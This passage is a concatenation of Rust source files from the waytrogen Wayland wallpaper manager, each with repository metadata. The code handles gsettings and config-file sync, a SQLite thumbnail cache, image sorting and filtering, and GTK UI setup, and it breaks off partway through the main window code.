trace!("Setting monitor gsetting."); settings.set_uint("monitor", self.monitor)?; trace!("Setting sort-by gsetting"); settings.set_uint("sort-by", self.sort_by)?; trace!("Setting invert-sort gsetting"); settings.set_boolean("invert-sort", self.invert_sort)?; trace!("Setting changer gsetting"); settings.set_uint("changer", self.changer)?; trace!("Setting image-filter gsetting"); settings.set_string("image-filter", &self.image_filter)?; trace!("Setting swaybg-mode gsetting"); settings.set_uint("swaybg-mode", self.swaybg_mode)?; trace!("Setting swaybg-color gsetting"); settings.set_string("swaybg-color", &self.swaybg_color)?; trace!("Setting mpvpaper-pause-option gsetting"); settings.set_uint("mpvpaper-pause-option", self.mpvpaper_pause_option)?; trace!("Setting mpvpaper-slideshow-enable gsetting"); settings.set_boolean("mpvpaper-slideshow-enable", self.mpvpaper_slideshow_enable)?; trace!("Setting mpvpaper-slideshow-interval gsetting"); settings.set_double( "mpvpaper-slideshow-interval", self.mpvpaper_slideshow_interval, )?; trace!("Setting mpvpaper-additional-options gsetting"); settings.set_string( "mpvpaper-additional-options", &self.mpvpaper_additional_options, )?; trace!("Setting selected-monitor-item gsetting"); settings.set_string("selected-monitor-item", &self.selected_monitor_item)?; trace!("Setting swww-resize gsetting"); settings.set_uint("swww-resize", self.swww_resize)?; trace!("Setting swww-fill-color gsetting"); settings.set_string("swww-fill-color", &self.swww_fill_color)?; trace!("Setting swww-scaling-filter gsetting"); settings.set_uint("swww-scaling-filter", self.swww_scaling_filter)?; trace!("Setting swww-transition-type gsetting"); settings.set_uint("swww-transition-type", self.swww_transition_type)?; trace!("Setting swww-transition-step gsetting"); settings.set_double("swww-transition-step", self.swww_transition_step)?; trace!("Setting swww-transition-duration gsetting"); settings.set_double("swww-transition-duration", self.swww_transition_duration)?; trace!("Setting swww-transition-angle gsetting"); settings.set_double("swww-transition-angle", self.swww_transition_angle)?; trace!("Setting swww-transition-position gsetting"); settings.set_string("swww-transition-position", &self.swww_transition_position)?; trace!("Setting swww-invert-y gsetting"); settings.set_boolean("swww-invert-y", self.swww_invert_y)?; trace!("Setting swww-transition-wave-width gsetting"); settings.set_double( "swww-transition-wave-width", self.swww_transition_wave_width, )?; trace!("Setting swww-transition-wave-height gsetting"); settings.set_double( "swww-transition-wave-height", self.swww_transition_wave_height, )?; trace!("Setting swww-transition-bezier-p0 gsetting"); settings.set_double("swww-transition-bezier-p0", self.swww_transition_bezier_p0)?; trace!("Setting swww-transition-bezier-p1 gsetting"); settings.set_double("swww-transition-bezier-p1", self.swww_transition_bezier_p1)?; trace!("Setting swww-transition-bezier-p2 gsetting"); settings.set_double("swww-transition-bezier-p2", self.swww_transition_bezier_p2)?; trace!("Setting swww-transition-bezier-p3 gsetting"); settings.set_double("swww-transition-bezier-p3", self.swww_transition_bezier_p3)?; trace!("Setting swww-transition-fps gsetting"); settings.set_uint("swww-transition-fps", self.swww_transition_fps)?; trace!("Setting hide-changer-options-box gsetting"); settings.set_boolean("hide-changer-options-box", self.hide_changer_options_box)?; Ok(()) } } pub fn get_config_file() -> anyhow::Result<ConfigFile> { let config_file = get_config_file_path()?; let mut config = match config_file.exists() { true => OpenOptions::new() .read(true) .write(true) .create(false) .open(&config_file)?, false => { warn!("Config file was not found: Attempting to create a new one."); OpenOptions::new() .read(true) .write(true) .create(true) .truncate(true) .open(&config_file)? } }; let mut config_contents = String::new(); let _ = config.read_to_string(&mut config_contents)?; let config_file_struct = match serde_json::from_str::<ConfigFile>(&config_contents) { Ok(s) => { trace!("{}", "Successfully obtained configuration file"); s } Err(_) => { remove_file(&config_file)?; config = OpenOptions::new() .read(true) .write(true) .create(true) .truncate(true) .open(&config_file)?; let config_file = ConfigFile::default(); let config_string = serde_json::to_string_pretty::<ConfigFile>(&config_file)?; config.write_all(config_string.as_bytes())?; config_file } }; match parse_executable_script(&config_file_struct.executable_script) { Ok(_) => { trace!("{}", "Successfully parsed executable script"); } Err(e) => { error!("Failed to parse executable script: {e}"); return Err(anyhow!("Failed to parse executable script: {e}")); } }; Ok(config_file_struct) }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/ui_common.rs
src/ui_common.rs
use crate::{ common::{CacheImageFile, GtkPictureFile, RGB}, database::DatabaseConnection, fs::get_image_files, mpvpaper::generate_mpvpaper_changer_bar, swaybg::generate_swaybg_changer_bar, swww::generate_swww_changer_bar, wallpaper_changers::{ MpvPaperPauseModes, MpvPaperSlideshowSettings, SWWWResizeMode, SWWWScallingFilter, SWWWTransitionBezier, SWWWTransitionPosition, SWWWTransitionType, SWWWTransitionWave, SwaybgModes, U32Enum, WallpaperChanger, WallpaperChangers, }, }; use async_channel::Sender; use gettextrs::gettext; use gtk::{ self, gdk::Display, gio::{spawn_blocking, ListStore, Settings}, glib::{BoxedAnyObject, Object}, prelude::*, Box, DropDown, GridView, ListItem, ListScrollFlags, StringObject, Switch, }; use log::debug; use std::{ cell::Ref, cmp::Ordering, path::{Path, PathBuf}, str::FromStr, }; pub const SORT_DROPDOWN_STRINGS: [&str; 2] = ["Date", "Name"]; pub fn generate_image_files( path: String, sender_cache_images: Sender<CacheImageFile>, sort_dropdown: String, invert_sort_switch_state: bool, sender_changer_options: Sender<bool>, sender_images_loading_progress_bar: Sender<f64>, ) { spawn_blocking(move || { sender_changer_options .send_blocking(false) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); let files = get_image_files(&path, &sort_dropdown, invert_sort_switch_state); for (index, file) in files.iter().enumerate() { sender_images_loading_progress_bar .send_blocking((index as f64) / (files.len() as f64)) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); if let Ok(i) = DatabaseConnection::check_cache(file) { sender_cache_images .send_blocking(i) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); } } sender_changer_options .send_blocking(true) .unwrap_or_else(|_| panic!("{}", gettext("The channel must be open"))); }); } pub fn change_image_button_handlers( image_list_store: &ListStore, wallpaper_changers_dropdown: &DropDown, selected_monitor_dropdown: &DropDown, settings: &Settings, ) { image_list_store .into_iter() .filter_map(std::result::Result::ok) .filter_map(|o| o.downcast::<ListItem>().ok()) .for_each(|li| { let entry = li.item().and_downcast::<BoxedAnyObject>().unwrap(); let image: Ref<CacheImageFile> = entry.borrow(); let selected_monitor = selected_monitor_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string(); let selected_changer = get_selected_changer(wallpaper_changers_dropdown, settings); selected_changer.change(PathBuf::from(&image.path), selected_monitor); }); } pub fn generate_changer_bar( changer_specific_options_box: &Box, selected_changer: &WallpaperChangers, settings: Settings, ) { while changer_specific_options_box.first_child().is_some() { changer_specific_options_box.remove(&changer_specific_options_box.first_child().unwrap()); } match selected_changer { WallpaperChangers::Hyprpaper => {} WallpaperChangers::Swaybg(_, _) => { generate_swaybg_changer_bar(changer_specific_options_box, &settings); } WallpaperChangers::MpvPaper(_, _, _) => { generate_mpvpaper_changer_bar(changer_specific_options_box, settings); } WallpaperChangers::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { generate_swww_changer_bar(changer_specific_options_box, settings); } } } #[must_use] pub fn get_selected_changer( wallpaper_changers_dropdown: &DropDown, settings: &Settings, ) -> WallpaperChangers { let selected_item = wallpaper_changers_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_string() .to_lowercase(); match &selected_item[..] { "swaybg" => { let mode = SwaybgModes::from_u32(settings.uint("swaybg-mode")); let rgb = settings.string("swaybg-color").to_string(); WallpaperChangers::Swaybg(mode, rgb) } "mpvpaper" => { let pause_mode = MpvPaperPauseModes::from_u32(settings.uint("mpvpaper-pause-option")); let slideshow_enable = settings.boolean("mpvpaper-slideshow-enable"); let slideshow_interval = settings.double("mpvpaper-slideshow-interval") as u32; let options = settings.string("mpvpaper-additional-options").to_string(); let changer = WallpaperChangers::MpvPaper( pause_mode, MpvPaperSlideshowSettings { enable: slideshow_enable, seconds: slideshow_interval, }, options.clone(), ); debug!( "{}: {} {} {} {}", gettext("Selected changer"), changer, slideshow_enable, slideshow_interval, options ); changer } "swww" => { let resize = SWWWResizeMode::from_u32(settings.uint("swww-resize")); let fill_color = RGB::from_str(settings.string("swww-fill-color").as_str()).unwrap(); let scaling_filter = SWWWScallingFilter::from_u32(settings.uint("swww-scaling-filter")); let transition_type = SWWWTransitionType::from_u32(settings.uint("swww-transition-type")); let transition_step = settings.double("swww-transition-step") as u8; let transition_duration = settings.double("swww-transition-duration") as u32; let transition_angle = settings.double("swww-transition-angle") as u16; let transition_position = SWWWTransitionPosition::new(settings.string("swww-transition-position").as_str()) .unwrap(); let invert_y = settings.boolean("swww-invert-y"); let transition_wave = SWWWTransitionWave { width: settings.double("swww-transition-wave-width") as u32, height: settings.double("swww-transition-wave-height") as u32, }; let transition_bezier = SWWWTransitionBezier { p0: settings.double("swww-transition-bezier-p0"), p1: settings.double("swww-transition-bezier-p1"), p2: settings.double("swww-transition-bezier-p2"), p3: settings.double("swww-transition-bezier-p3"), }; let transition_fps = settings.uint("swww-transition-fps"); WallpaperChangers::Swww( resize, fill_color, scaling_filter, transition_type, transition_step, transition_duration, transition_fps, transition_angle, transition_position, invert_y, transition_bezier, transition_wave, ) } _ => WallpaperChangers::Hyprpaper, } } pub fn sort_images( sort_dropdown: &DropDown, invert_sort_switch: &Switch, image_list_store: &ListStore, image_grid: &GridView, ) { image_list_store.sort(compare_image_list_items_by_sort_selection_comparitor( sort_dropdown.clone(), invert_sort_switch.clone(), )); if image_list_store.into_iter().len() != 0 { image_grid.scroll_to(0, ListScrollFlags::FOCUS, None); } } pub fn hide_unsupported_files( image_list_store: &ListStore, current_changer: &WallpaperChangers, removed_images_list_store: &ListStore, sort_dropdown: &DropDown, invert_sort_switch: &Switch, name_filter: &str, ) { removed_images_list_store .into_iter() .filter_map(std::result::Result::ok) .for_each(|o| { let b = o.downcast::<BoxedAnyObject>().unwrap(); image_list_store.insert_sorted( &b, compare_image_list_items_by_sort_selection_comparitor( sort_dropdown.clone(), invert_sort_switch.clone(), ), ); }); removed_images_list_store.remove_all(); let ls = image_list_store .into_iter() .filter_map(std::result::Result::ok) .collect::<Vec<_>>(); debug!("Filtered list store size: {}", ls.len()); for o in ls { let item = o.clone().downcast::<BoxedAnyObject>().unwrap(); let image_file: Ref<GtkPictureFile> = item.borrow(); if !current_changer.accepted_formats().contains( &Path::new(&image_file.cache_image_file.path) .extension() .unwrap_or_default() .to_str() .unwrap_or_default() .to_owned(), ) || !&image_file .cache_image_file .name .to_lowercase() .contains(&name_filter.to_lowercase()) { debug!( "Image name: {}, Name Filter: {name_filter}, Contains: {}", &image_file.cache_image_file.name, &image_file.cache_image_file.name.contains(name_filter) ); transfer_and_remove_image(removed_images_list_store, image_list_store, &o, &item); } } } fn transfer_and_remove_image( removed_images_list_store: &ListStore, image_list_store: &ListStore, o: &Object, item: &BoxedAnyObject, ) { removed_images_list_store.append(item); image_list_store.remove(image_list_store.find(o).unwrap()); } #[must_use] pub fn gschema_string_to_string(s: &str) -> String { s.replace("\\\"", "\"") .replace("\\{", "{") .replace("\\}", "}") } #[must_use] pub fn string_to_gschema_string(s: &str) -> String { s.replace('"', "\\\"") .replace('{', "\\{") .replace('}', "\\}") } pub fn compare_image_list_items_by_sort_selection_comparitor( sort_dropdown: DropDown, invert_sort_switch: Switch, ) -> impl Fn(&Object, &Object) -> Ordering { move |img1, img2| { let invert_sort_switch_state = invert_sort_switch.state(); match &sort_dropdown .selected_item() .unwrap() .downcast::<StringObject>() .unwrap() .string() .to_lowercase() .to_string()[..] { "name" => { compare_image_list_items_by_name_comparitor(invert_sort_switch_state)(img1, img2) } _ => compare_image_list_items_by_date_comparitor(invert_sort_switch_state)(img1, img2), } } } pub fn compare_image_list_items_by_name_comparitor( invert_sort_switch_state: bool, ) -> impl Fn(&Object, &Object) -> Ordering { move |img1, img2| { let image1 = img1.downcast_ref::<BoxedAnyObject>().unwrap(); let image1: Ref<GtkPictureFile> = image1.borrow(); let image2 = img2.downcast_ref::<BoxedAnyObject>().unwrap(); let image2: Ref<GtkPictureFile> = image2.borrow(); if invert_sort_switch_state { image1 .cache_image_file .name .partial_cmp(&image2.cache_image_file.name) .unwrap() } else { image2 .cache_image_file .name .partial_cmp(&image1.cache_image_file.name) .unwrap() } } } pub fn compare_image_list_items_by_date_comparitor( invert_sort_switch_state: bool, ) -> impl Fn(&Object, &Object) -> Ordering { move |img1, img2| { let image1 = img1.downcast_ref::<BoxedAnyObject>().unwrap(); let image1: Ref<GtkPictureFile> = image1.borrow(); let image2 = img2.downcast_ref::<BoxedAnyObject>().unwrap(); let image2: Ref<GtkPictureFile> = image2.borrow(); if invert_sort_switch_state { image1 .cache_image_file .date .partial_cmp(&image2.cache_image_file.date) .unwrap() } else { image2 .cache_image_file .date .partial_cmp(&image1.cache_image_file.date) .unwrap() } } } pub fn get_available_monitors() -> Vec<String> { let monitors = Display::default().unwrap().monitors(); monitors .into_iter() .filter_map(std::result::Result::ok) .filter_map(|o| o.downcast::<gtk::gdk::Monitor>().ok()) .filter_map(|m| m.connector()) .map(|s| s.to_string()) .collect::<Vec<_>>() }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/database.rs
src/database.rs
use crate::common::{CacheImageFile, CACHE_FILE_NAME, CONFIG_APP_NAME}; use anyhow::anyhow; use gettextrs::gettext; use log::{debug, trace, warn}; use rusqlite::{Connection, Result}; use std::path::Path; pub struct DatabaseConnection { connetion: Connection, } impl DatabaseConnection { fn new() -> anyhow::Result<DatabaseConnection> { let xdg_dirs = xdg::BaseDirectories::with_prefix(CONFIG_APP_NAME)?; let cache_path = xdg_dirs.place_cache_file(CACHE_FILE_NAME)?; let conn = Connection::open(cache_path.to_str().unwrap())?; let query = " CREATE TABLE IF NOT EXISTS gtkimagefile ( image TEXT NOT NULL, name TEXT NOT NULL, date INTEGER NOT NULL, path TEXT NOT NULL ); "; conn.execute(query, ())?; Ok(DatabaseConnection { connetion: conn }) } pub fn select_image_file(&self, path: &Path) -> anyhow::Result<CacheImageFile> { let query = "SELECT image, name, date, path FROM GtkImageFile where path = ?1;"; let mut statement = self.connetion.prepare(query)?; let pix_buf_bytes = statement .query_map([path.to_str().unwrap_or_default()], |row| { Ok(CacheImageFile { image: row.get(0)?, name: row.get(1)?, date: row.get(2)?, path: row.get(3)?, }) })? .filter_map(|c| c.ok()) .collect::<Vec<_>>(); if pix_buf_bytes.is_empty() { return Err(anyhow!("No result could be found")); } Ok(pix_buf_bytes[0].clone()) } pub fn insert_image_file(&self, image_file: &CacheImageFile) -> anyhow::Result<()> { let query = "INSERT INTO GtkImageFile(image, name, date, path) VALUES (:image, :name, :date, :path);"; self.connetion.execute( query, ( &image_file.image, &image_file.name, &image_file.date, &image_file.path, ), )?; Ok(()) } pub fn check_cache(path: &Path) -> Result<CacheImageFile, anyhow::Error> { let conn = DatabaseConnection::new()?; match conn.select_image_file(path) { Ok(f) => { trace!("{}: {}", gettext("Cache Hit"), f.path); Ok(f) } Err(e) => { trace!( "{}: {} {}", gettext("Cache Miss"), path.to_str().unwrap(), e ); match CacheImageFile::from_file(path) { Ok(g) => { trace!( "{} {}", gettext("GTK Picture created successfully."), g.path ); conn.insert_image_file(&g)?; debug!("{} {}", "Picture inserted into database.", &g.path); Ok(g) } Err(e) => { warn!( "{}: {} {}", gettext("File could not be converted to a GTK Picture"), path.to_str().unwrap(), e ); Err(e) } } } } } }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/main.rs
src/main.rs
use clap::Parser; use gtk::glib; use log::error; use std::{thread::sleep, time::Duration}; use waytrogen::{ cli::{ cycle_next_wallpaper, delete_image_cache, launch_application, print_app_version, print_wallpaper_state, restore_wallpapers, set_random_wallpapers, Cli, }, dotfile::{self, get_config_file}, }; fn main() -> glib::ExitCode { let mut args = Cli::parse(); stderrlog::new() .module(module_path!()) .verbosity(args.log_level as usize) .init() .unwrap(); let config_file = match get_config_file() { Ok(c) => c, Err(e) => { error!("Failed to get config file: {e}"); return glib::ExitCode::FAILURE; } }; match config_file.write_to_gsettings() { Ok(_) => {}, Err(e) => { error!("Failed to write gsettings from configuration file: {e}"); return glib::ExitCode::FAILURE; } } if args.external_script.is_none() && !config_file.executable_script.is_empty() { args.external_script = Some(config_file.executable_script); } if args.restore { sleep(Duration::from_millis(args.startup_delay)); restore_wallpapers() } else if args.list_current_wallpapers { print_wallpaper_state() } else if args.random { sleep(Duration::from_millis(args.startup_delay)); set_random_wallpapers() } else if args.version { print_app_version() } else if args.next.is_some() { sleep(Duration::from_millis(args.startup_delay)); cycle_next_wallpaper(&args) } else if args.delete_cache { delete_image_cache() } else { let _ = launch_application(args); let config_file = match dotfile::ConfigFile::from_gsettings() { Ok(c) => c, Err(e) => { error!("Failed to get config file: {e}"); return glib::ExitCode::FAILURE; } }; match config_file.write_to_config_file() { Ok(_) => glib::ExitCode::SUCCESS, Err(_) => glib::ExitCode::FAILURE, } } }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/common.rs
src/common.rs
use gtk::{glib::SignalHandlerId, Picture}; use image::ImageReader; use lazy_static::lazy_static; use log::trace; use regex::Regex; use serde::{Deserialize, Serialize}; use std::{ cell::RefCell, fmt::Display, io::Cursor, os::unix::fs::PermissionsExt, path::{Path, PathBuf}, process::Command, str::FromStr, time::UNIX_EPOCH, }; use crate::wallpaper_changers::WallpaperChangers; use gettextrs::gettext; pub const THUMBNAIL_HEIGHT: i32 = 200; pub const THUMBNAIL_WIDTH: i32 = THUMBNAIL_HEIGHT; pub const APP_ID: &str = "org.Waytrogen.Waytrogen"; pub const GETTEXT_DOMAIN: &str = "waytrogen"; pub const CONFIG_APP_NAME: &str = "waytrogen"; pub const CACHE_FILE_NAME: &str = "cache.db"; pub const CONFIG_FILE_NAME: &str = "config.json"; pub struct GtkPictureFile { pub picture: Picture, pub cache_image_file: CacheImageFile, pub button_signal_handler: RefCell<Option<SignalHandlerId>>, } #[derive(Clone, Default, PartialEq)] pub struct CacheImageFile { pub image: Vec<u8>, pub name: String, pub date: u64, pub path: String, } impl CacheImageFile { pub fn from_file(path: &Path) -> anyhow::Result<CacheImageFile> { let image = Self::generate_thumbnail(path)?; Self::create_gtk_image(path, image) } fn get_metadata(path: &Path) -> anyhow::Result<(String, String, u64)> { let path = path.to_path_buf(); let name = path.file_name().unwrap().to_str().unwrap().to_owned(); let date = std::fs::File::open(path.clone())?.metadata()?.modified()?; let date = date.duration_since(UNIX_EPOCH)?.as_secs(); Ok((path.to_str().unwrap().to_string(), name, date)) } fn create_gtk_image(path: &Path, image: Vec<u8>) -> anyhow::Result<CacheImageFile> { let fields = Self::get_metadata(path)?; let image_file = CacheImageFile { image, path: fields.0, name: fields.1, date: fields.2, }; Ok(image_file) } fn generate_thumbnail(path: &Path) -> anyhow::Result<Vec<u8>> { if let Ok(i) = Self::try_create_thumbnail_with_image(path) { return Ok(i); } if let Ok(i) = Self::try_create_thumbnail_with_ffmpeg(path) { return Ok(i); } Err(anyhow::anyhow!( "{}: {}", gettext("Failed to create thumbnail for"), path.as_os_str().to_str().unwrap_or_default() )) } fn try_create_thumbnail_with_ffmpeg(path: &Path) -> anyhow::Result<Vec<u8>> { let temp_dir = String::from_utf8(Command::new("mktemp").arg("-d").output()?.stdout)?; let output_path = PathBuf::from(temp_dir.trim()).join("temp.png"); trace!("ffmpeg Output Path: {}", output_path.to_str().unwrap()); let code = Command::new("ffmpeg") .arg("-i") .arg(path) .arg("-y") .arg("-ss") .arg("00:00:00") .arg("-frames:v") .arg("1") .arg(output_path.clone()) .spawn()? .wait()? .code() .unwrap_or(255); match code { 0 => Self::try_create_thumbnail_with_image(&output_path), _ => Err(anyhow::anyhow!(gettext( "Thumbnail could not be generated using ffmpg." ))), } } fn try_create_thumbnail_with_image(path: &Path) -> anyhow::Result<Vec<u8>> { let thumbnail = ImageReader::open(path)? .with_guessed_format()? .decode()? .thumbnail(THUMBNAIL_WIDTH as u32, THUMBNAIL_HEIGHT as u32) .to_rgb8(); let mut buff: Vec<u8> = vec![]; thumbnail.write_to(&mut Cursor::new(&mut buff), image::ImageFormat::Png)?; Ok(buff) } } #[derive(Debug, Serialize, Deserialize, Clone, Default, PartialEq)] pub struct RGB { pub red: f32, pub green: f32, pub blue: f32, } impl Display for RGB { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!( f, "{:02x}{:02x}{:02x}", (self.red * 255.0) as u8, (self.green * 255.0) as u8, (self.blue * 255.0) as u8 ) } } lazy_static! { static ref rgb_regex: Regex = Regex::new(r"[0-9A-Fa-f]{6}").unwrap(); } impl FromStr for RGB { type Err = String; fn from_str(s: &str) -> Result<Self, Self::Err> { if rgb_regex.is_match(s) { let s = s.to_lowercase().chars().collect::<Vec<_>>(); let red = hex::decode(s[0..=1].iter().collect::<String>()).unwrap(); let red = f32::from(red[0]) / 255.0; let green = hex::decode(s[2..=3].iter().collect::<String>()).unwrap(); let green = f32::from(green[0]) / 255.0; let blue = hex::decode(s[4..=5].iter().collect::<String>()).unwrap(); let blue = f32::from(blue[0]) / 255.0; Ok(Self { red, green, blue }) } else { Err(gettext("Invalid string")) } } } #[derive(Clone, Serialize, Deserialize, Debug, Default)] pub struct Wallpaper { pub monitor: String, pub path: String, pub changer: WallpaperChangers, } pub const APP_VERSION: &str = env!("CARGO_PKG_VERSION"); pub fn sort_by_sort_dropdown_string(files: &mut [PathBuf], sort_by: &str, invert_sort: bool) { match sort_by { "name" => { files.sort_by(|f1, f2| { if invert_sort { f1.file_name().partial_cmp(&f2.file_name()).unwrap() } else { f2.file_name().partial_cmp(&f1.file_name()).unwrap() } }); } "date" => { files.sort_by(|f1, f2| { if invert_sort { f1.metadata() .unwrap() .created() .unwrap() .partial_cmp(&f2.metadata().unwrap().created().unwrap()) .unwrap() } else { f2.metadata() .unwrap() .created() .unwrap() .partial_cmp(&f1.metadata().unwrap().created().unwrap()) .unwrap() } }); } _ => {} } } pub fn parse_executable_script(s: &str) -> anyhow::Result<String> { if s.is_empty() { return Ok(String::new()); } let path = s.parse::<PathBuf>()?; if !path.metadata()?.is_file() { return Err(anyhow::anyhow!("Input is not a file")); } if path.metadata()?.permissions().mode() & 0o111 == 0 { return Err(anyhow::anyhow!("File is not executable")); } Ok(s.to_owned()) } pub fn get_config_file_path() -> anyhow::Result<PathBuf> { let xdg_dirs = xdg::BaseDirectories::with_prefix(CONFIG_APP_NAME)?; let config_file = xdg_dirs.place_config_file(CONFIG_FILE_NAME)?; Ok(config_file) }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/main_window.rs
src/main_window.rs
use crate::{ cli::Cli, common::{ CacheImageFile, GtkPictureFile, Wallpaper, APP_ID, THUMBNAIL_HEIGHT, THUMBNAIL_WIDTH, }, ui_common::{ change_image_button_handlers, compare_image_list_items_by_sort_selection_comparitor, generate_changer_bar, generate_image_files, get_available_monitors, get_selected_changer, gschema_string_to_string, hide_unsupported_files, sort_images, string_to_gschema_string, SORT_DROPDOWN_STRINGS, }, wallpaper_changers::{get_available_wallpaper_changers, WallpaperChanger}, }; use async_channel::{Receiver, Sender}; use gettextrs::{gettext, ngettext}; use gtk::{ self, gdk::Texture, gio::{spawn_blocking, Cancellable, ListStore, Settings}, glib::{self, clone, spawn_future_local, BoxedAnyObject, Bytes}, prelude::*, Align, Application, ApplicationWindow, Box, Button, DropDown, Entry, FileDialog, GridView, Label, ListItem, ListScrollFlags, MenuButton, Orientation, Picture, Popover, ProgressBar, ScrolledWindow, SignalListItemFactory, SingleSelection, StringObject, Switch, Text, TextBuffer, }; use log::debug; use std::{ cell::{Ref, RefCell}, path::PathBuf, process::Command, }; #[derive(Clone)] struct SensitiveWidgetsHelper { receiver_changer_options_bar: Receiver<bool>, image_list_store: ListStore, wallpaper_changers_dropdown: DropDown, settings: Settings, sort_dropdown: DropDown, invert_sort_switch: Switch, images_loading_progress_bar: ProgressBar, image_grid: GridView, changer_specific_options_box: Box, removed_images_list_store: ListStore, monitors_dropdown: DropDown, } pub fn build_ui(app: &Application, args: &Cli) { let window = create_application_window(app); if get_available_wallpaper_changers().is_empty() { create_no_changers_window(&window); return; } let settings = Settings::new(APP_ID); let image_list_store = ListStore::new::<BoxedAnyObject>(); let removed_images_list_store = ListStore::new::<BoxedAnyObject>(); let folder_path_buffer = create_folder_path_buffer(&settings); let path = textbuffer_to_string(&folder_path_buffer); log::trace!("{}: {}", gettext("Wallpaper Folder"), path); let (sender_cache_images, receiver_cache_images): ( Sender<CacheImageFile>, Receiver<CacheImageFile>, ) = async_channel::bounded(1); let (sender_enable_changer_options_bar, receiver_changer_options_bar): ( Sender<bool>, Receiver<bool>, ) = async_channel::bounded(1); let (sender_images_loading_progress_bar, receiver_images_loading_progress_bar): ( Sender<f64>, Receiver<f64>, ) = async_channel::bounded(1); let open_folder_button = create_open_folder_button(&folder_path_buffer, &window); let monitors_dropdown = create_monitors_dropdown(&settings); let wallpaper_changers_dropdown = create_wallpaper_changers_dropdown(); let image_signal_list_item_factory = setup_image_signal_list_item_factory( &monitors_dropdown, &wallpaper_changers_dropdown, &settings, args.clone(), ); let image_grid = create_image_grid(&image_signal_list_item_factory, &image_list_store); let scrolled_winow = create_image_grid_scrolled_window(&image_grid); let sort_dropdown = create_sort_dropdown(&settings); let (invert_sort_switch, invert_sort_switch_label) = create_invert_sort_switch(&settings); connect_sorting_signals( &sort_dropdown, &invert_sort_switch, &image_list_store, &image_grid, ); let selected_sort_method = selected_item_as_string(&sort_dropdown); generate_image_files( path.clone(), sender_cache_images.clone(), selected_sort_method.clone(), invert_sort_switch.state(), sender_enable_changer_options_bar.clone(), sender_images_loading_progress_bar.clone(), ); let changer_specific_options_box = create_changer_specific_options_box(); connect_wallpaper_changers_signals( &wallpaper_changers_dropdown, &invert_sort_switch, &monitors_dropdown, &settings, &sort_dropdown, changer_specific_options_box.clone(), (&image_list_store, &removed_images_list_store), ); let image_filter_entry = create_image_filter_entry( &settings, &image_list_store, &monitors_dropdown, &sort_dropdown, &invert_sort_switch, &removed_images_list_store, &wallpaper_changers_dropdown, ); let options_menu_button = create_options_menu_button(&invert_sort_switch, &invert_sort_switch_label); let hide_changer_options_box = settings.boolean("hide-changer-options-box"); let hide_changer_options_box = if args.hide_bottom_bar.is_some() { args.hide_bottom_bar.unwrap() } else { hide_changer_options_box }; let changer_options_box = create_changer_options_box(hide_changer_options_box); changer_options_box.append(&monitors_dropdown); changer_options_box.append(&open_folder_button); changer_options_box.append(&sort_dropdown); changer_options_box.append(&image_filter_entry); changer_options_box.append(&options_menu_button); changer_options_box.append(&wallpaper_changers_dropdown); changer_options_box.append(&changer_specific_options_box); connect_folder_path_buffer_signals( &folder_path_buffer, &image_list_store, &invert_sort_switch, ( sender_enable_changer_options_bar, sender_images_loading_progress_bar, ), &selected_sort_method, sender_cache_images, ); let application_box = create_application_box(); application_box.append(&scrolled_winow); application_box.append(&changer_options_box); create_cache_image_future(&image_list_store, receiver_cache_images); let images_loading_progress_bar = create_images_loading_progress_bar(); changer_options_box.append(&images_loading_progress_bar); let sensitive_widgets_helper = SensitiveWidgetsHelper { receiver_changer_options_bar, image_list_store, wallpaper_changers_dropdown: wallpaper_changers_dropdown.clone(), settings: settings.clone(), sort_dropdown, invert_sort_switch, images_loading_progress_bar: images_loading_progress_bar.clone(), image_grid, changer_specific_options_box: changer_specific_options_box.clone(), removed_images_list_store, monitors_dropdown, }; create_disable_ui_future(sensitive_widgets_helper); create_progress_image_loading_progress_bar_future( receiver_images_loading_progress_bar, images_loading_progress_bar, ); generate_changer_bar( &changer_specific_options_box, &get_selected_changer(&wallpaper_changers_dropdown, &settings), settings, ); window.set_child(Some(&application_box)); } fn setup_image_signal_list_item_factory( monitors_dropdown: &DropDown, wallpaper_changers_dropdown: &DropDown, settings: &Settings, args: Cli, ) -> SignalListItemFactory { let image_signal_list_item_factory = SignalListItemFactory::new(); let previous_wallpapers_text_buffer = TextBuffer::builder().build(); settings .bind("saved-wallpapers", &previous_wallpapers_text_buffer, "text") .build(); image_signal_list_item_factory.connect_setup(clone!(move |_factory, item| { let item = item.downcast_ref::<ListItem>().unwrap(); let button = Button::builder() .vexpand(true) .hexpand(true) .can_shrink(true) .has_tooltip(true) .build(); item.set_child(Some(&button)); })); bind_image_list_item_factory( &image_signal_list_item_factory, monitors_dropdown, wallpaper_changers_dropdown, settings, args, previous_wallpapers_text_buffer, ); image_signal_list_item_factory } fn bind_image_list_item_factory( image_signal_list_item_factory: &SignalListItemFactory, monitors_dropdown: &DropDown, wallpaper_changers_dropdown: &DropDown, settings: &Settings, args: Cli, previous_wallpapers_text_buffer: TextBuffer, ) { image_signal_list_item_factory.connect_bind(clone!( #[weak] monitors_dropdown, #[weak] wallpaper_changers_dropdown, 